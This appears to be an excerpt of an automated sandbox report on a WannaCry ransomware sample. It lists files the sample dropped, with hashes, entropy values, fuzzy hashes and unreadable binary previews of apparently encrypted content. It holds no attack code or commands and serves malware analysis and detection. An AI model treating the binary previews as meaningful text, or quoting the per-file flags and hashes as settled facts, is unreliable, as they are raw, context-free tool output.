                                                                                      Preview:.5 ...:dT.j.-AA ....]..4..W..W.B...R.?.oC.q..?.....p5...[<.4 `.....}..]+=...lt...I......->!....M../..ME...mQbJZ..X.....A.vr.I|X2..<....,1."..|r...........czG...>.+..R.=.l.y.+.......*..&..:f.....]...sl.Ud0b....M.\...W'..a..a...eQ....._.!.....}....]k..Fo.jc.J......A.....OFX....dV|k..O.../..F2w.r..v<L...(>f.O..,.oU.....*`.h1.+.....I...:z.S.0.@.r..Mm).u.0......1)c.....tG|.<.7...2Y........./R8...B...3.Z,>...%..1....\?,..).#..A...9:t[......t......F.w!....V...$.......I..0(..C..Z.a.|q...c.vG..?"...K...#8?.D......L.D.1v/..^d..e...Ze..^.T./...Z...C...$....A.....9....y..a\.l.j.&...X.m...@.B.`pb.L...t...SQ3.d.......#........o..K..Q...?q.&LI...\j..S..z...;..S.W...z...s...4.>...Su..4...."%B....7........l..G.f&..K.|.F....iB...j.`-+..+Y^!M.{.;.....^.i/....5...V.D.8.#4nC_.N..g..n.5....XP./..0..=~....VX...n."!...O2.j7%.Y.....<vN:..>.....ah<...pv..N...;Jk.x.&I..}.M..9.cO.....k.5n.xR......b.yL+....yMv.h..+[.U....o...8.S.........'..l5c.g......`.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.794014215801389
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:om9SNxWbaIyMJ0cGujosEfDpp+6BVPIADToo:dS/cjyw0Juq26BRDEo
                                                                                      MD5:D22E8B78F2020EF2ADC5B29E88C121BD
                                                                                      SHA1:8758DFE3D1C82C4B60E53D64D43C3F9B2ED3B49B
                                                                                      SHA-256:7661222C44BAF8F77F99C5A05316993F9CAFBE63A73B88C833DF7E7A0EB9265E
                                                                                      SHA-512:312111FF736D076195404DD5A4AACF36C2C23809203FE0EF3F51B4B1958B92695366EE8B55B5148B3AA3176905D52A90182EBDE3860B164897CE1221A88D7767
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:O..Br.CEq.bZ.o....dv...HAD/o...t'..2 .......%e...X..h.B.;.A......w..2.....H#.....b(.P......2vr........x. %d.|.]j....K....'...M....L..*...."u.........1.D.B.&e.v#F{...a+[@h...dc..0Pu..O..M\.....W~M..xO...(.AA3...........k>...`...O..t...g........C...i.&G."...N<L?kK.....)..\IEO...'..Y.P7..X.h..I..v.)..e...y.o...}..N4..E..x....'.....W.8.<...H4{4..rM.g.k1.+..hB.#PHw..z.!...Uz.Q9..t......<..xKX>l..\...v.n.....&.....m..Q..EPo......D..E"......J.}..'.q.WA6....4.P....+...Q....}7.{.D.Y%...\......5...<5..t.(6l.I.ul.6.3...q].#...m...?.....I.%..@#.m....;.).a.Ph.j.h.9..Rm.`. .........v[.L<t.53.*Y.\..l.....Z......q.....4}.\..ca..z.....4.j.x.........siKkUO.(.0#..i|@..e...H....n......DO....X.J..JO....S.n.].u[...g&YA^.F.Y..0.U.s...L.@.......De..$EA2.(..:r...........y.~.y.8..p ..E;]A...w..].......[...;p.?;b.9@...7S....2.."...".=.)V0.!.._.........>.M..v)......Ty..V0R.N~.. ..L........1...L...*........1..W5.P.^J.$NF..._..C..O.......h..........k.E.)R...l*..}x..~.a...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.81411086634184
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:j+s/tHwE+QNw56ZkQx8kNf6n+oVUsVof7894zQlucss:ntHwEFNj8p+oVUsGz84Fbs
                                                                                      MD5:8FE4444A5F39F5BD4D8BCC933E7394B3
                                                                                      SHA1:DF9981793EC8F9F26FA1E810AE832B2136955FF2
                                                                                      SHA-256:764B1B76C671A86076090236F45452EFE13B45E4630104EDCF6FBBF7B0D4F3A3
                                                                                      SHA-512:1EC55EC28E283A406A4AD520B6EC6A57241D9ED53ABDFA72CB7C5FD2F994D89C2FF9E98C1839C79207DD702A74094842F4163168E0BAFCB9770D16FB08A4D28A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....V..-p.....1n.:.B.!v..@..^...+..Iq.....#..H.TD...d.....+d?E.....O..v.MT..8....At......b......Z..E.....96..g..%..........].x.H.........yw..|.J.o|...6-.^4I ...:..b....6x=..U.K.Mr9...C...l.T9..b......eWZ...>0B..X...a.&9#8,$..V4.."...t.3...6.{.=....ow...^..2.K\.b.[....3.p.......Q.pt.(.7.mc...?XH....z.5.\....4..H....w.F......:78.a.pxU..'?ke..c..*m}...(.......V.wp........u*.......N...-.D$;...j*..1u...X..`..;c/..n...>:..ow....f.... 4D......[d..n...KL...y.c.._.m...{M...]........0...zj..E4..c...On.bQ7....0G.O...%....#.*O(r..t.Bd\e/.=.......`;..h.....}lz..n...R/.c...r...2H..,...xx}.k;.c..N9.A.r^..X\.%..t.f.<......u...7.....C.I.a.`......3J...........qB..y...4vr..._.v...yU..b.h.Us..)(.....X.O.B..r<`..C............c..w.....~BX...=..4.+4....y.yi.. r.d...5F.....Y[`..!(...IH.....t...hE...f/..o.2..v..$.....V.:L.iO.T3.s..j..I f7.z...r..z......s.4~..5..........Y...X..f*...f....;...EE.81...i.......o.v...{...+..x.....U.....k.]`%..Y.A+.}x.o~.dJ.:......D.{
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.818570899833059
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:VYVN+RtjS8MDAqJbWBv0A61nvIMBMNWU4jiDe9wh5ALW3JuNn:VMN+SBDAqJbWVm1nv28xjW15AnF
                                                                                      MD5:1B327DB94C118387A0A3D9428FCCA7AC
                                                                                      SHA1:2F858104D4E2D6D83F9E2AE2E3427E40856609A9
                                                                                      SHA-256:06E02C57B1FD9A288D9715153800A246DB77D665A2CD600ECDEC0B6F4687ECCF
                                                                                      SHA-512:BDB498D8D8A51D68CCDF01217B4E8D8577AD72CD31321E465200714F4E6DE1229BF23352C3E025ABA6AB09648370E432F64638D6044C203B3FA449C455BFAD51
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.nc....8...''a.,L.z.D..6......CswJ....g.\.:.E...DNu~...bisf..`..S5..T..EY38.&...#...18..w[.*......?(.?.`..{p6.]~..9G.@.j.._..I.....d.u..!.|%!..Q+....h.2....".d.?.yq*...E...g......:f."!.TGN:..&.9..H.Y..y..\b#..DRPS...........bS......."..x...U...t..(m.....q.....a...3.V....H....mQA.... .U. ..i......q.......I...R...J....#..q.9.u..^n. S..<..%..o..w.$.zX...K.c..h.39..f..Z.!?Te.wI~...."...5F..Y..2%....'.B......z..x...P.....=-....2P|.{..YV.'...@.......B~([..5.....C.S-v.cK.ua..B...X^.u.OL..$...]'..F........&%.0W...BH.).Fk.N...5....6(~<..3.....D.n.3.#...B....|..._hu.d...3y.......@.....Dh.I=..8........[....O.......J.....+!F..jQ..(>;%T|..]....._>...X../;.z..4A&../.u....s..j..w...i...g....5......Y,..(j.B.._.J.....t....]..g..9.ft\wO....]J..\V.h..T.@Vf1.....QR[..(.H../.1.....F.>..v..d...p6...Lo.l...+.HY..&2.R..m.{.....[....Q......>U....&..?~4$<Q.'....M*.Q*cd+C._^.%ehI..$..RX,...O.pU....fa...i....<..G..z[.... ..j;R.....=....;....n#..m..v...N.B.=.V2.s(...."[..y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.794708491395063
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:QHZC9SF2u1tXoscP9nGjfsw5MMhVmPX6vvvS/V9gKzlcDAn4:Qt4s+9nGj0w5McVmPX6vvvVYwA4
                                                                                      MD5:42CF0638CCF84C66A393B085D2CA2814
                                                                                      SHA1:85282F50661FACF1677B6FE4E198B52503A1B8E6
                                                                                      SHA-256:5BB95DE08EDE444EA5DC1CBCCDA1BA77E6615D8286172B457DD1015C3C8DB854
                                                                                      SHA-512:7FCD9B99811C2808374C6A27FDF86EB43BDCE58E3B71AE7A44FF179E00DB2C3834C6E0FB2BC2A87971340F9FBB28F526088857DE62B8CDAF0DBECA9328561043
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:~.....e!Vb......<}c...d..d...d...iK...%.}_....WI$..5..Tib..LR...Me...-..bCE.....b|.V....$...r.}pW.^Pm..A....M..[..Y.1..7V.A.F9A..i.}.Y..1........Q1.q.b.......+r9..(..4.9d&..T.+,.o..U......x.$.^....H|...Y..8.xb....N...t...yP...........Z.y....".^......"...~.T(XXx.~...oVC. .8*r..%.m.d.e/EW_...Z].%..T.u<.......c.....I..+.6.|DDQ.o..@...#......y]-..t.....a..ctS.]h..K.e}.6.......!v....".M~g.G.AD<.S..d.V..J..1e].r..C.f..Kb.#...D.^Xzi.a V...0...W>2..}.1"..|....p..H....|....<rh>o[]N/..ulb.q.|......BE.&$....`..*...}.WlB.......J..[.....p......d..T.\..n..|..2y..F.i.......0".?..W&.."'...tZ.G..X... 8.8....6.3..f- A...4.....!.KA..4.L.x.)&_[??...&....!.....`.~..v*...}\V.&....1.`h...6(.I.../.......R.T......i.....uI....dkr+3.L.j.w[.>.u9.[S....&F..,..ui..:z. ..T.(.CP&...}..j|l.:....P4S.l.......W....[d...[.S..}.|.!.OL!SI.h...M..V........Y.%>....0.c.3./...5.......vo..0..=.E..-.L.....Z|..:...a...|._.2.$...{C.....{i.tH.5...._oL}5.....]..CPJ......S.f.....q......|.'&.gN
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.815106126808348
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ovD1VCF3HJoaDmFJCYHXyqcao0rWZw2w7eqlo5yO1hYDcyykS3bCN:ob63e7FZiqcao06coYDcytS3bCN
                                                                                      MD5:D32308D4C74D85D8EE56339006595698
                                                                                      SHA1:7E2F4BC2FA648CD6BA44FA1E1AABE5B751D21514
                                                                                      SHA-256:5BC5A2F47F232879509E06E44658CFD99AA2FE0E78BC03A05AB45BB033ADEF8A
                                                                                      SHA-512:74173750ADBA49BBC9635E38DA88EF8F7610689A10CF616AE9A7BC87269679DA16B147660E95330C49100E8A0CF57ADA920791E5B0725CABE0491689F86D42CC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:|.E..%r.pb.T.^o.X?.e........(Q....)AuG..=Y..f..F.%.O..B.V.tQ..t1FT.S.~.X.X!C.&K.=fZ.h.[...4..]...A=.Yj.3*....6[,.[F...N. '[.0.@.e.).iiC..5Cp.Tj33.h.Z. A....&.a....3$sl.......L...Ra.fZ...6M#......M..t........Q..S...:.Y.U %...."`,...M.../.C:F.z..T6. ..r..f..<. ........o;z...0...N......s.1.........Xb`....4..6$A"..,*............t.........^\.A..6g"{.c..iz.a..u7'=.(rL.:...[.EC.%Z"=....5.(A.P.R........&.Q.._$Z|......b..h......w9.......m/S..@..^\vnP..{......48w#_...,............0[....T.2.p..u...ov`.....Uk..$.m.M..b.k.@.IP\.._yrk......|i.....Q......>..!.O}.[)............,og5'Y....4x+....v.0.\..M....V..A.U.Y.z&.7O...4..4:.......... ...*.. J3...?h.}.t...e].q.-{.....d{.sV..xN.._N].v...57.Z.....>".4I..y.^....J..Lm.1..l...:Z.A.{&Y....u..eJKVM.9?X...{..Y./o..P.P/...0..^V.. .y3.)I.9.A.......=`i...0...M6......N#Z.G.H&DL...L..,>E-.iC.O.].w[..G.~=D.I.4e.|.....v0R.[$<....x.....W...=...h....>...^.....0p...f.!..Y.^a.P;.)T.%..f.(.'xB.b.4....Z.l.....R]XN+.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.78800029283677
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:VOHrH7LjpziUHbwMxfHFEyno2OSs1FnJM8eFWQEdJfYSiKI:VyrHNzh7Hpq3pVleN
                                                                                      MD5:C1DAA06BDE65465D1FA684CA53D0089F
                                                                                      SHA1:5DDF1CEA213FCD7D10CB72EEB2D88A376D257FA7
                                                                                      SHA-256:7BC97FEDE9A71C5C84953D41DD858152AEC9C4C875BE5C820D46E676FBB1DDEB
                                                                                      SHA-512:2FBC69D394EE3770A87F407CFFCD2E43870249ED695B9CAD7E1E23CDC46898DD93C47EDCEA3177FE60E4FBCD26C68B1BBDBDFF0ECC9A2167A502FC70123B5FE2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....A.....Y_.%...C....!{&..O*.v.........7..I.%B.@xD.u.p...u-...'.............7...U.f.CW....f.....IKq.jS.G.o (....`..%J*{.(...=..@n....D..{...K.Z..1..E.'...Z:.v...F.65Ox...h.\Y...$..k.......6..9x........*..g\E..X...0.uP...%h...6.V...<.C.. .b..c.^,+....%.;.A|%.....mS............0.......M.~......2Lm.l~..>..T..A.K...qCF..=..s"..n.x.A...|... .R.o/!BAm`/g.....C8........dR..,.B.u.>..F......K.X.%..[]SI....P........(....v+}~...Z=.5.E.<...x.....t......".(p...oFz...M.1s..O..^..........a.*..h...Zd..vd......iq+..J..;.<'.?p.\../,\...2g.?w..{..v..Q..s.M6.....;....`.>...L....W..['UT&&i_.'.I|....Q.?=.=.C.7..t."O..A"F.j.vX.0..?.@=.7.<..\f.....i...2.2......._X...LxVDv.ZL..GG.m.E.:.P.....h..p-.w8...Ni ..s.F.W../...s.|.J.v.w...Z ...y#.....W#h.s>![+....0..V....Jw..../....=..e.&0......4}...C.h.Y..._...... )......Nfc4x~.z..m....7P.{......a...!m...q.L...!}.N......k....c.,d+.nQlu.!d..4......[.....tZK..,#.[...R.?../.ddq....]......NT.!.^............SY.F3..q.E..^;4...m
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.834230382940874
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:5C//OXYQTWtqAkNJq/picTiApWlNW5z7dlx2lQ2A4:5CdkWt7IA/0cuLenE1x
                                                                                      MD5:BAA177A8A1588AAD72DB0337B1A66916
                                                                                      SHA1:C89017381930476154487EDABD772E68C3D6676D
                                                                                      SHA-256:683E5E59DD9C4C0F77342DE6C6F66DD52B755C0EFB0D9D5905DF02FCBDD68108
                                                                                      SHA-512:E00E751500A3C0244DEB1DA9F3E64A6A14F4525A153D07906905FF4EEA53E25B7FEDB45C774F977710EDB1CD3E547099AD15FF752455427E97BDAF82E6785F88
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:A1V..................`...0v....l.._H..t.9...^.....?7...x...2&o?......@i|...d......Z"...QK...g5....V..B....eE..W.$....A...F..+...%5.P.P.&.......h...2...X.Gti-g..V....}tl.......z..q.E.D..U............l|.Th.I......c.d.k....;...3,.SS.y..../ dn...3D.]..IB.$...r...~.?A.......y..k.."1....U....j..6.J..:68o.#.....>.......X..a....Og.:&.Q.f?.bP...<...sV$.......F<CA...D.....+.....=Yg.w...~..X.^....u.S%4..C...a......36.(`VgR0.7....T!..c...4......Rz..).@./..|.-S....d...q.X{S...P..A%bB......J...z..E.......o;.~P....N!........Hh..\.m.c..SI..1.^=c.5..bi./.'6[.U....M..Q..G..A._.D !.o ...30.@U.H.z...iBa.y61?.g....!..f.7zr.d............LG..1..k.0ix....i..0YY....6.T."V.i.R..h,..c..,.M.39.F....C..h.+.\K....u7.5O.B..a.?v.J...n0'4(r.#....!..........xd...").6.....z......`.p........._..]n~.m.b^.o(p..R7.l[.........=9%..L...>1.P).b......j0F..?.c..o.uY..T]...%l....V.U.2-M.......\...$0.z...J.9.B......&..\.....*..~...Q#.os}RM..]..V...4Yky......:.6.?P.t.&....D...}...X7%.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.811879963003176
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:JU69H7upXeEyJOMgAUFRblTrHzKh6j6msWB29jdgrC:JU6V7upXerHg1RbJfKa29pUC
                                                                                      MD5:D939EDE8C65673A3C4A2BDF7C96AA92E
                                                                                      SHA1:8EAB22B54DBD749D0A4FDDED120D3E3E3E3AAA01
                                                                                      SHA-256:512D8831025861D60FBCB1F021757D3875741CDADFE22D65D0203982DC18E90E
                                                                                      SHA-512:547B145CAF47A40AC1999B20A201F95C2014FA3E1C683B6DA91B0C439389DDCA232EA8941845A42F3DA09FD8E3B4CFD73191F1D32F42C9F79413C93AFF157D0F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......$...hU.|.......xqO..n.....L..Fcg>....$W.8..>.7].......A.[....c...Z..r...I~....8e.l.a.....59.U!a..(._L."....v<..'...0K7..o......H:.G........o.h....a?V9.....>..P....Y..U|1..y.m2...=,...0...$_...w&..y....S.N;{{...T.B.,...._....!.;}yQ.{.[..{..ox@........k..r.`.x..7j......j5.Q...s.+.Jp..|G..L+Wc.Yt..h*9g@.....e..k.-.0l.......f..;.....T.?B.wc...R..@..*.~t...9.7.A.....L\J........b...............mP|...B....j}.T.l>..{.u.5I..B....K#!.6h....Q......rR.=Q...y...U3.?..`.......Cn.!I....=}../6J..z-.K........K...an..q8.l.......el[>kk.....?.@.....wa...#.(..}.1x,.P..w...b..Jc%......(^u.T.&gO\t.D...V.7..../...r.......z..n....H.4.6._...A....R.......x.'p.&...C....4.3..h..S..&5..W....O?.....'.,..?..&0O..b...|.....?..Ou....4.....t!Z.Z..$-.V.L........`....Jh...\.)..C....lU..`.;_...GF.^.Z...$...T.i..j..L..g.?...x..:..9..wn.\Z.W...5.f..x3w..7O..\Fg.v......;Isp.c{...7U&.F-..y..}C..d...-.l..(...OD.....>..Y..5y.).;\.Ad./.y.L......d.&.[...V..nAjT.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.784075471106713
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:gtqJ9CID90SsA1IwuMBJmPT2OZV5iSgaCJqB9B83fiHKJBIPjzE:gtqJ9xDTjnKPqOZV5rgFBqqQXE
                                                                                      MD5:9F111A72DF69B9C5888473CC241BC298
                                                                                      SHA1:3A79F3D8F532024E2A03BB53B0DB6716CDBEE093
                                                                                      SHA-256:982E8E51D01BFEE2B6745496AD35812BFFD280F0C58C0968F004AC8DBA918D79
                                                                                      SHA-512:B37AF930A5F1AA9BD14288BAFD43BA4977D6BA32F783BD8F6D65A4FF9023DAF3844611DF694B21C71B29E13D00206B939054472259F3EED08CD59149DB8B3F12
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.....gsw....l.M,./-..3.x.'.;W._..').ij......V.W....s..|R..k6..W.....0..W.._t-..?k..j..MT..].....kB`..f~..wo...k...$..U.Z`~..+.0....e..:.Tt.C...R.h.!..............y..us.....*t9...~N....E.#.^J..E.^.C.nE..7g...Z...{.$.2.}./`!.bBW...a.`...:..8..4Y..D\".C....Ft..<.......t.&..&......\..'<.w....#.$U.u<..%..z.=5...JL...S".?wS?.P...!.|.....ip,5......w.|9..h.....-......|..<nH.x...L.Ki..[n_1]?)...o..b....Nr.a.P..5...E-.P!....F..Q..`.[.u.O.j.1.r]...e..z..)n..s..H.o...d~a.S..V.....cE.l."....E.N....bv.S...\w..R\....yW_....YF.D.U..i.....].....gFo...H.$.c....$.rw"0f...kF....s.=v.2.@..#...n@LV.....b.].}H=..X...6il.RPo.....W..d..8x-..H...2L..U..g.`\.{H}...W..[o..Bo?..E.DP....;...EX..{m"...'.....k]t..8..`..c.._.S`..G..E.5.....!.o*..;.#xsr.o.ae.0........-.{.__Z..;....).....Q&EQ........cIdR.......9......}O.0;QY[.....#..L..f....:...%...~X.:..T.LN>..K1Z..#R...QcF..0.....=....o.(.1.7'.....B...$.V@..pe..v..g..s.t.e..x.@.\...M.B.g.........)*.#...).HY*....7+..'...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.821769213296615
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:70q/zOWrmcN9vOlL65J+eWTEdw7lhoPrC:hnCcN8mJ+fTEd0oTC
                                                                                      MD5:6C04D406728E4F4712092BC01DF94DE1
                                                                                      SHA1:D0EE3E574FE3514C04520A751D618F4C41D1D8A7
                                                                                      SHA-256:F7F10B83FFD0CF6DD97BCD3ED42B499826E9C016E46B94850B1758DAB72122D6
                                                                                      SHA-512:526489C22A49AF9967131B0C4556E9B589A3E4CF50A887FAA3BA3D0FD188D7C32EFEBB29BCDAD54AB093B92EEBB149A578F59B81929C978DC5B388F660FB21B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:k..T.Z..O...2Uk..2v..5..wJ..R....Z..iV8....{^p.0_..0l@:E........k;...vv.r..........V....^h...........E^....(..S.O.oR....r86..m...3d^. ..f..U.......3...7.>..'.....p....@..E....Tw.8.4.9M.S.m5...lJ|.8[......6....8j..O....)... -\....y..p2....K....D.K.{.....)[D.N..... .....T..B.s.d.ZD.."N4.D....,..p[.E9H....8...s..*..?..i.V....-p.......Hq7..{\.......B.D.7..o4t=.j.)Y..uV.<.u2..6+9...6.$.q/.f.@V..O..cPAc....c........lSS...Q...X4i..G..['..a..5....L(..w..{.-...)..Z..........3..U.k.G&W.ads:..*........X. .../(3.&.E.H..V.!.......'.z.EP..0.......X.....ZT.Gz.@HKQ<..k.V../..hr.*.........F..M....*M5.^..X..2H!=...Z...Cu<2.nB.Yr....f..o..-Z.5T.L..h.....K.......I...}v..v>6...01>eG5c.O......F....;..aJ.r..).#U.....O.....d..rnI..-.l....(....X......'...9.."K..|.z?..6...7.Y.o".....uW.9k.(..8.1..vF.;;e..H..Q9.W.D{.._:.......7.DYT...8......w.]..\..v.%..........g?...%.(......{..)U.]..[.....3h...a@.}..-..E......{.yA....".m.....p.`l.tq{.$n..N..}....:.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.813455010631493
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:74fv/u2ZnApCgX3fiDd/iIJ1ef2jv7boPTHZr8Ynf7qan:8fvW2uCevadKIzef2jv70bqYDbn
                                                                                      MD5:A1BDA59EA929E10BD5BF49095B434031
                                                                                      SHA1:6AFD3FAC30F4D3F44277525A4E071654F97F1767
                                                                                      SHA-256:E71B35D475BE8895570694678BBCA276BF0402E627D9551381AC72EE87C82E24
                                                                                      SHA-512:A9A824DA3A1E428C38169B16B492B074FDC70433C62309F66769D9ABE05C0484F86839C3884D68A76592F9E22E567FF70C7D54B6599661D77D1DAB385E249785
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..rz...r.6....!..,...[/x].h.....:?.N?.k&...c....'A.c...&..8^.{.....C.e.....>...(.N...V[.l9.6.....&:.a.".u..9.v.tph..>}8...WpZm.N.%...........SF.......\b....)P".....g.t.]l.@G.~k..h.......YK..f.._i..*<'.o..P...Q..Q..6i............P..#R*.....2...?..>k...PN...QG..I.H..^^Y$....m--..[......a...p..AsS.9K.a.)..x...{:hOTS.......O...*R..vi...&kD...H.Ka...0.6.U.....6\..!.{...I......1.2.xM*@....V..c.U.'>.a;c+.=\.U.......s..._YM@g|.I....Ac.a&..j.V%Z...]*.F@ig.."....TH)...'..'[.:. >....-.)c.*..7.]...Ml.*...\./.h..O....K.&E._..ii..3<.RA..J.!....L..>.l.6...G....~T.Elue...,.(ih.4..j.:.:1g...w....OA..Wg<....L/.|g.........l.....)..?d.fZ..S...uK%Tj.8.n.erV`..WB..?..U......$..D...-.V..LU......6.[..Gl..l...)...F.cl..F...{kV.C.s.`<...F...,a+...+.^..:a.P8.Z..s....QW<8...|.V....7..//.n..GP=Zh,..C...-...Ci.Vc.....}-..A<i.(..pU....>PZo...d}..)..@..bc..R......-d.>...DA....L.T..^...c..u.#;...dW.F..H..E....{....4).H.Q.!........2....Y=.q.yA.W.0\T.......9K...<.^A.~D.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.797498118319819
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qrYvuqz9G4wF4SWrpYBaYqTp+qvdTHW8qEo4tB0ZKWYzV69XYN:3261rpYoQWZr5I9U
                                                                                      MD5:0642D86B9FEF146AD6D6768E864B7148
                                                                                      SHA1:AEF0521F599222630CA07EDB95AE79A0010BBC5F
                                                                                      SHA-256:ED68CE17053DFAF9F5D946A433FBC8ECA4A282A501D56545DF5F1B959F8B76B3
                                                                                      SHA-512:564B49589E3F133FC9880B00785C9B10A32B984647EE43881AEB732D51636A49C3C00A4389ABC7DCA78B486629A593F114184A8228E3B9813D29AD07B0BD9AD4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:`c.....Zyc...QA.G.2...t4.....L..7..P.i=S....p&&E"6*.:..?..../k.L=..&.Q...... r...v..G.+......jGY...c..1 ."...r.(.2.#.3.'./.'tF.Y.r.jY.7...Wnu..._..N...|..4W..(".{.._..n...$.K......0.)....y....W.......Uj.zp.|.@.ZO>.(.....vDN..%.c..B..!.......Z5c.C.......\lN...VS..).J...>Z.n.Z ..q4sE.b:.S.l...4...K....t...BOZ..)+....1..6.^.L...;..p.\R..X.....`+......u$.yR.....M..;R....;+.|6.l..J.x..*.);......$9.........rZJ.x.._7..n.09.0.xK.59.L....d{T..i........!t..M.V.y*.K......!b...Zf*-...U...W..w..T....-..C.-.1.#..S`...$..|...0..E........p..........W&?.e:.....y.........V.c..M.;...jV52V.]!5,+n...NG..... J.bC#.4z.....Q.&Co.....r......]YnX...I/.8....|.V..6.KM.6uy1. H...b.J.{.#~r..9...5..E.......Yz..N5)..X;...|OS_.=M.._.i.L.e..JJ...h.^.r.c....p..e...+.(Sr0.D..m-Z|.?t.J.-...}.. ..t...g....#zMS.m..R.&......[...v|..~..E.`C^>S..:...;.$...il6.|I4.\.P.@.>....W....M=.,7..f.=..c..JH..P.~b6!..w.x.......y.B....]3T.WZ.V..u....v.FE.........Qh..[..I.i..;'.-Z{....x.`.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.806392421034246
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:w4OoXQleqSZ6W7VT0hoFje/dE6gtYshWSBniHu9WrZqF1AzJLV:gtleqGl0qte/dE6gtGSfsdqwzJJ
                                                                                      MD5:6D8DF2FCE1C8E70D09E2DC9B4A1CF24C
                                                                                      SHA1:71973E7A57BB9DF3A911DF795F3FA0A120B9B9BC
                                                                                      SHA-256:C8BFF4F7E764A5CDC9CC6F3D1D084A19E48D797B4FAF2B8B815F0AF3E564B23E
                                                                                      SHA-512:BE71AD3B98706D71D711F0038A1EB6F96BF863ED5E8DE133B17C11FC93D43AE813714740456B42AAA8E9568B4C47780E9D6E66762F2207AE48C80F0A2AD83CDE
                                                                                      Malicious:false
                                                                                      Reputation:low
